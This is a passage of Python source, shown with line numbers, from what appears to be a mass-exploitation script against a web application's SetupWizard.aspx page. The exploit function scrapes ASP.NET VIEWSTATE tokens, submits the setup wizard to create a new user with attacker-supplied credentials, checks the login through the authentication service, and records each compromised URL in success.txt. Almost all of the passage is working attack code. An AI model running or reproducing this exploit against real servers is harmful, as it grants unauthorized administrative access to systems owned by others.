(url, username, password, domain)
| 15 | } |
| 16 | |
| 17 | def exploit(url, username, password, domain): |
| 18 | if checkVersion(url): |
| 19 | try: |
| 20 | initial_request = requests.get(url=url + "/SetupWizard.aspx/", verify=False) |
| 21 | viewstate_1 = re.search(r'value="([^"]+)"', initial_request.text).group(1) |
| 22 | viewgen_1 = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', initial_request.text).group(1) |
| 23 | next_data = {"__EVENTTARGET": '', "__EVENTARGUMENT": '', "__VIEWSTATE": viewstate_1, |
| 24 | "__VIEWSTATEGENERATOR": viewgen_1, |
| 25 | "ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton": "Next"} |
| 26 | next_request = requests.post(url=url + "/SetupWizard.aspx/", headers=exploit_header, data=next_data, verify=False) |
| 27 | exploit_viewstate = re.search(r'value="([^"]+)"', next_request.text).group(1) |
| 28 | exploit_viewgen = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', next_request.text).group(1) |
| 29 | exploit_data = {"__LASTFOCUS": '', "__EVENTTARGET": '', "__EVENTARGUMENT": '', "__VIEWSTATE": exploit_viewstate, |
| 30 | "__VIEWSTATEGENERATOR": exploit_viewgen, "ctl00$Main$wizard$userNameBox": username, |
| 31 | "ctl00$Main$wizard$emailBox": username + f"@{domain}", |
| 32 | "ctl00$Main$wizard$passwordBox": password, "ctl00$Main$wizard$verifyPasswordBox": password, |
| 33 | "ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton": "Next"} |
| 34 | requests.post(url=url + "/SetupWizard.aspx/", headers=exploit_header, data=exploit_data, verify=False) |
| 35 | check_url = url + "/Services/AuthenticationService.ashx/TryLogin" |
| 36 | check_data = f"""["{username}","{password}",null,null,null]""" |
| 37 | check_header = { |
| 38 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36", |
| 39 | "Content-Type": "application/json" |
| 40 | } |
| 41 | check_response = requests.post(url=check_url, data=check_data, headers=check_header, verify=False) |
| 42 | if check_response.ok and "1" in check_response.text: |
| 43 | print(f"[+] {url} Successfully added user. username: {GREEN}{username}{RESET} and password: {GREEN}{password}{RESET}") |
| 44 | with open("success.txt", "a+") as success_file: |
| 45 | success_file.write(url + "\n") |
| 46 | success_file.close() |
| 47 | except: |
| 48 | pass |
| 49 | |
| 50 | def checkVersion(url): |
| 51 | try: |
nothing calls this directly
no test coverage detected